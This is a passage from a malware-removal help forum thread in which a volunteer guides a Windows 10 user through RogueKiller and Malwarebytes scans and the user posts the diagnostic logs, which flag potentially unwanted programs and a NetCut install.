FirewallRules: [UDP Query User{68F5AD81-DDC5-43CB-A46A-4DEE5423F99C}\\usr-pc\gamehouse\resident evil 6\bh6.exe] => (Allow) \\usr-pc\gamehouse\resident evil 6\bh6.exe
FirewallRules: [TCP Query User{98B45A98-C6B9-4AA0-A9B8-3587885C9D2B}\\usr-pc\gamehouse\resident evil 6\bh6.exe] => (Allow) \\usr-pc\gamehouse\resident evil 6\bh6.exe
FirewallRules: [UDP Query User{AA874175-A8EE-47EB-8877-4D0C0373CBCF}C:\program files (x86)\capcom\resident evil 6\bh6.exe] => (Allow) C:\program files (x86)\capcom\resident evil 6\bh6.exe
FirewallRules: [TCP Query User{D0CE51F2-5AEE-443A-8C38-861999D811D3}C:\program files (x86)\capcom\resident evil 6\bh6.exe] => (Allow) C:\program files (x86)\capcom\resident evil 6\bh6.exe
FirewallRules: [UDP Query User{C8E1220B-33B0-4F0F-91BD-FC1A744584B0}C:\program files (x86)\microsoft studios\age of empires iii - complete collection\bin\age3.exe] => (Allow) C:\program files (x86)\microsoft studios\age of empires iii - complete collection\bin\age3.exe
FirewallRules: [TCP Query User{757BFCD5-75C1-4377-8E04-F7DC3026E87A}C:\program files (x86)\microsoft studios\age of empires iii - complete collection\bin\age3.exe] => (Allow) C:\program files (x86)\microsoft studios\age of empires iii - complete collection\bin\age3.exe
FirewallRules: [{15A5088F-BF27-4B93-9F42-C11F1A1F46D1}] => (Block) C:\program files (x86)\sniper ghost warrior 2\bin32\sniperghostwarrior2.exe
FirewallRules: [{9B0EDE8F-DBAF-4AC7-BE10-54F86011478A}] => (Block) C:\program files (x86)\sniper ghost warrior 2\bin32\sniperghostwarrior2.exe
FirewallRules: [UDP Query User{490DB369-4DDC-4A1E-BFDE-C02EE7D3943A}C:\program files (x86)\sniper ghost warrior 2\bin32\sniperghostwarrior2.exe] => (Allow) C:\program files (x86)\sniper ghost warrior 2\bin32\sniperghostwarrior2.exe
FirewallRules: [TCP Query User{1B7838C9-A86E-4793-840D-AF237BE770AE}C:\program files (x86)\sniper ghost warrior 2\bin32\sniperghostwarrior2.exe] => (Allow) C:\program files (x86)\sniper ghost warrior 2\bin32\sniperghostwarrior2.exe
FirewallRules: [UDP Query User{CC2C9EF8-6723-4A2E-872D-E5AC27228094}C:\program files (x86)\rockstar games\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [TCP Query User{F016BBFC-6387-4A47-BCE2-7E69B68BA880}C:\program files (x86)\rockstar games\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [UDP Query User{3DDA99A6-D265-4C86-9432-3F6CB04416F3}C:\program files (x86)\microsoft studios\age of empires iii - complete collection\bin\age3.exe] => (Allow) C:\program files (x86)\microsoft studios\age of empires iii - complete collection\bin\age3.exe
FirewallRules: [TCP Query User{88D69A19-C8C7-41DA-A468-3EC565D2C72E}C:\program files (x86)\microsoft studios\age of empires iii - complete collection\bin\age3.exe] => (Allow) C:\program files (x86)\microsoft studios\age of empires iii - complete collection\bin\age3.exe
FirewallRules: [{694FC46A-055D-4F26-9021-7D9C220BBD2C}] => (Allow) G:\Wifi Hotspot\Baidu WiFiHotspot\WifiHotspot.exe
FirewallRules: [{3B98A2AD-E44F-442D-8A6F-06549F5871AF}] => (Allow) G:\Wifi Hotspot\Baidu WiFiHotspot\WifiHotspot.exe
FirewallRules: [UDP Query User{5C2F8DC1-21B0-410C-B97E-34999CA4B5F8}C:\program files (x86)\splinter cell conviction\src\system\conviction_game.exe] => (Allow) C:\program files (x86)\splinter cell conviction\src\system\conviction_game.exe
FirewallRules: [TCP Query User{FA98A3D9-EEC0-497A-A255-104B329DBCAB}C:\program files (x86)\splinter cell conviction\src\system\conviction_game.exe] => (Allow) C:\program files (x86)\splinter cell conviction\src\system\conviction_game.exe
FirewallRules: [UDP Query User{4884DB2B-D5F6-4D49-855D-A8951A0D7595}C:\program files (x86)\rockstar games\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [TCP Query User{2CE596B1-299E-482B-B921-9ECE9860CA41}C:\program files (x86)\rockstar games\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [TCP Query User{DDE4A971-402D-437B-B1B2-0B62C0F00980}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{0BC31391-9E22-4CEE-A562-3E9C9068B26D}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [{75D70031-F757-4256-81AC-1776841F14E0}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{507D0D2D-0FC2-4644-AA3D-B81817786283}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{37AA25AD-29DA-4C78-B9DB-68F2B3009783}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe
FirewallRules: [{E6639186-662C-4F23-B81D-8AB5144C8C3A}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe
FirewallRules: [{BD3BB9CB-6640-4DCF-825F-31CC3F6BCF89}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe
FirewallRules: [{8DE5E038-0234-4BF3-A13D-E054603F5155}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe
 
==================== Restore Points =========================
 
ATTENTION: System Restore is disabled
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (09/01/2017 07:52:57 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (09/01/2017 07:52:40 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007267C
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (09/01/2017 06:57:20 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=UserLogon;SessionId=2
 
Error: (09/01/2017 06:49:30 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007139F
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (09/01/2017 06:49:28 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007139F
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (09/01/2017 06:45:48 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=UserLogon;SessionId=1
 
Error: (09/01/2017 06:45:45 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (09/01/2017 06:32:57 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program dllhost.exe version 10.0.15063.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: 1cbc
 
Start Time: 01d323156dab4199
 
Termination Time: 20
 
Application Path: C:\Windows\System32\dllhost.exe
 
Report Id: 76563e65-872d-49b9-bf6a-9043a3e1bf7b
 
Faulting package full name: 
 
Faulting package-relative application ID:
 
Error: (09/01/2017 06:22:12 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=UserLogon;SessionId=6
 
Error: (09/01/2017 06:18:50 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007139F
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
 
 
System errors:
=============
Error: (09/01/2017 06:47:38 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Sync Host_70a98 service terminated with the following error: 
Access is denied.
 
Error: (09/01/2017 06:47:06 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Dell Foundation Services service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (09/01/2017 06:47:06 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Dell Foundation Services service to connect.
 
Error: (09/01/2017 06:44:34 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The WsAppService service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (09/01/2017 06:44:34 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Ds3Service service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (09/01/2017 06:44:34 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Ds3Service service to connect.
 
Error: (09/01/2017 06:44:34 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the WsAppService service to connect.
 
Error: (09/01/2017 06:44:34 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The TrueKey service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (09/01/2017 06:44:34 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the TrueKey service to connect.
 
Error: (09/01/2017 06:44:33 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The TrueKeyScheduler service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
 
CodeIntegrity:
===================================
  Date: 2017-09-01 10:49:28.379
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_1a197825c61edb6c\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-01 10:49:28.014
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-01 00:45:07.142
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows.old\WINDOWS\WinSxS\amd64_microsoft-windows-t..lications-clientsku_31bf3856ad364e35_10.0.14393.447_none_58b521d1e40c309d\rdpinit.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-09-01 00:45:07.126
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows.old\WINDOWS\WinSxS\amd64_microsoft-windows-t..lications-clientsku_31bf3856ad364e35_10.0.14393.447_none_58b521d1e40c309d\rdpinit.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-09-01 00:45:07.115
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows.old\WINDOWS\WinSxS\amd64_microsoft-windows-t..lications-clientsku_31bf3856ad364e35_10.0.14393.447_none_58b521d1e40c309d\rdpinit.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-09-01 00:31:51.181
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows.old\WINDOWS\SysWOW64\GamePanel.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-09-01 00:31:51.158
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows.old\WINDOWS\SysWOW64\GamePanel.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-09-01 00:31:51.132
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows.old\WINDOWS\SysWOW64\GamePanel.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-09-01 00:26:17.163
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows.old\WINDOWS\System32\MusNotificationUx.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-09-01 00:26:17.156
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows.old\WINDOWS\System32\MusNotificationUx.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-5500U CPU @ 2.40GHz
Percentage of memory in use: 51%
Total physical RAM: 8103.23 MB
Available physical RAM: 3956.14 MB
Total Virtual: 13103.23 MB
Available Virtual: 8427.72 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:442.34 GB) (Free:52.65 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive e: (Aezia) (Fixed) (Total:488.18 GB) (Free:74.3 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: F07651AE)
Partition 1: (Not Active) - (Size=488.2 GB) - (Type=07 NTFS)
Partition 2: (Active) - (Size=442.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=913 MB) - (Type=27)
 
==================== End of Addition.txt ============================

 



BC AdBot (Login to Remove)

 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:28 AM

Posted 01 September 2017 - 08:19 AM

Hi AznanZ :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

RQKuhw1.pngRogueKiller
  • Download the right version of RogueKiller for your Windows version (32 or 64-bit)
  • Once done, move the executable file to your Desktop, right-click on it and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Click on the Start Scan button in the right panel, which will bring you to another tab, and click on it again (this time it'll be in the bottom right corner)
  • Wait for the scan to complete
  • On completion, the results will be displayed
  • Check every single entry (threat found), and click on the Remove Selected button
  • On completion, the results will be displayed. Click on the Open Report button in the bottom left corner, followed by the Open TXT button (also in the bottom left corner)
  • This will open the report in Notepad. Copy/paste its content in your next reply
j1Bynr2.pngMalwarebytes - Clean Mode
  • Download and install the free version of Malwarebytes
    Note: If you have Malwarebytes already installed, you don't need to install it again. Simply start from the next bullet point
  • Once Malwarebytes is installed, launch it and let it update his database. You might have to click on the little arrow by Scan Status in the middle right pane for it to do so
  • Once the database update is complete, click on the Scan tab, then select the Threat Scan button and click on Start Scan
  • Let the scan run, the time required to complete the scan depends of your system and computer specs
  • Once the scan is complete, make sure that the first checkbox at the top is checked (which will automatically check every detected item), then click on the Quarantine Selected button
    • If it asks you to restart your computer to complete the removal, do so
  • Click on Export Summary after the deletion (in the bottom-left corner) and select Copy to Clipboard. Paste the content in your next reply
Your next reply(ies) should include:
  • Copy/pasted RogueKiller log;
  • Copy/pasted Malwarebytes log;

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 AznanZ

AznanZ
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  

Posted 01 September 2017 - 10:41 PM

Sure, please wait Aura

#4 AznanZ

AznanZ
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  

Posted 02 September 2017 - 12:20 AM

RogueKiller V12.11.12.0 (x64) [Aug 28 2017] (Free) by Adlice Software
 
Operating System : Windows 10 (10.0.15063) 64 bits version
Started in : Normal mode
User : Aezia [Administrator]
Started from : C:\Users\Aezia Aznan\Downloads\Programs\RogueKiller_portable64.exe
Mode : Scan -- Date : 09/02/2017 11:04:43 (Duration : 01:14:10)
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 12 ¤¤¤
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-3909864297-3729878400-1751894149-1001\Software\DriverToolkit -> Found
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-3909864297-3729878400-1751894149-1001\Software\eSupport.com -> Found
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-3909864297-3729878400-1751894149-1001\Software\SecuredDownload -> Found
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-3909864297-3729878400-1751894149-1001\Software\DriverToolkit -> Found
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-3909864297-3729878400-1751894149-1001\Software\eSupport.com -> Found
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-3909864297-3729878400-1751894149-1001\Software\SecuredDownload -> Found
[PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\DriverAgent-Plus_is1 -> Found
[PUP.HackTool] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\NetCut_is1 -> Found
[PUP] (X64) HKEY_USERS\S-1-5-21-3909864297-3729878400-1751894149-1001\Software\Microsoft\Windows\CurrentVersion\Run | DriverAgent Plus : C:\ProgramData\DriverAgentPlus\DriverAgentPlus.exe -pcstatus [7] -> Found
[PUP] (X86) HKEY_USERS\S-1-5-21-3909864297-3729878400-1751894149-1001\Software\Microsoft\Windows\CurrentVersion\Run | DriverAgent Plus : C:\ProgramData\DriverAgentPlus\DriverAgentPlus.exe -pcstatus [7] -> Found
[PUP.HackTool] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\AIPS (C:\Program Files (x86)\netcut\services\AIPS.exe) -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{5edcc3f5-7431-424e-be6c-4c4416c03462} | DhcpNameServer : 10.254.0.1 ([])  -> Found
 
¤¤¤ Tasks : 1 ¤¤¤
[Suspicious.Path] \UninstMiniWifi -- C:\Users\AEZIAA~1\AppData\Local\Temp\MUBDC0.bat -> Found
 
¤¤¤ Files : 14 ¤¤¤
[PUP.Gen1][Folder] C:\ProgramData\DriverAgentPlus -> Found
[PUP.Gen1][Folder] C:\ProgramData\PC Faster -> Found
[PUP.HackTool][File] C:\Users\Aezia Aznan\Desktop\netcut.lnk [LNK@] C:\PROGRA~2\netcut\netcut.exe -> Found
[PUP.HackTool][File] C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Arcai.com's NetCut.lnk [LNK@] C:\PROGRA~2\netcut\netcut.exe -> Found
[PUP.Gen1][File] C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\DriverAgent Plus.lnk [LNK@] C:\PROGRA~3\DRIVER~1\DRIVER~1.EXE -> Found
[PUP.Gen1][Folder] C:\Users\Aezia Aznan\AppData\Local\DriverToolkit -> Found
[PUP.Gen1][Folder] C:\ProgramData\DriverAgentPlus -> Found
[PUP.HackTool][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\arcai.com\netcut.lnk [LNK@] C:\PROGRA~2\netcut\netcut.exe -> Found
[PUP.HackTool][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\arcai.com\Uninstall NetCut.lnk [LNK@] C:\PROGRA~2\netcut\unins000.exe -> Found
[PUP.Gen1][Folder] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eSupport.com -> Found
[PUP.Gen1][Folder] C:\ProgramData\PC Faster -> Found
[PUP.Gen1][Folder] C:\Program Files (x86)\DriverToolkit -> Found
[PUP.HackTool][Folder] C:\Program Files (x86)\netcut -> Found
[PUP.HackTool][File] C:\Users\Aezia Aznan\Desktop\netcut.lnk [LNK@] C:\PROGRA~2\netcut\netcut.exe -> Found
 
¤¤¤ WMI : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD10JPVX-75JC3T0 +++++
--- User ---
[MBR] 3c43b36d62e99fb218bc99997b5cf6eb
[BSP] a9dd24c197c140539584da590d68cb17 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 499900 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 1024002048 | Size: 452952 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 1951649792 | Size: 913 MB
User = LL1 ... OK
User = LL2 ... OK


#5 AznanZ

AznanZ
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  

Posted 02 September 2017 - 01:22 AM

Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 09/02/2017
Scan Time: 12:59 PM
Logfile: 
Administrator: Yes
 
Version: 2.2.1.1043
Malware Database: v2017.09.02.03
Rootkit Database: v2017.08.02.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows 10
CPU: x64
File System: NTFS
User: Aezia
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 298869
Time Elapsed: 18 min, 42 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 0
(No malicious items detected)
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 0
(No malicious items detected)
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)


#6 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:28 AM

Posted 02 September 2017 - 09:40 AM

The RogueKiller log you provided me is a scan one, did you remove all the threats it detected afterwards?

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#7 AznanZ

AznanZ
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  

Posted 02 September 2017 - 10:04 PM

yes

but looks like the behavior powemet is still alive



#8 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:28 AM

Posted 02 September 2017 - 11:42 PM

Looks like it. In that case, let's remove it via FRST. Let's get a fresh set of logs first.

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Scan mode
Follow the instructions below to download and execute a scan on your system with FRST, and provide the logs in your next reply.
  • Right-click on the executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds
  • Click on the Scan button
  • On completion, two message box will open, saying that the results were saved to FRST.txt and Addition.txt, then open two Notepad files
  • Copy and paste the content of both FRST.txt and Addition.txt in your next reply

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#9 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:28 AM

Posted 06 September 2017 - 07:19 AM

Hi AznanZ,

Are you still with me?

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#10 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:28 AM

Posted 08 September 2017 - 08:11 AM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.





1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users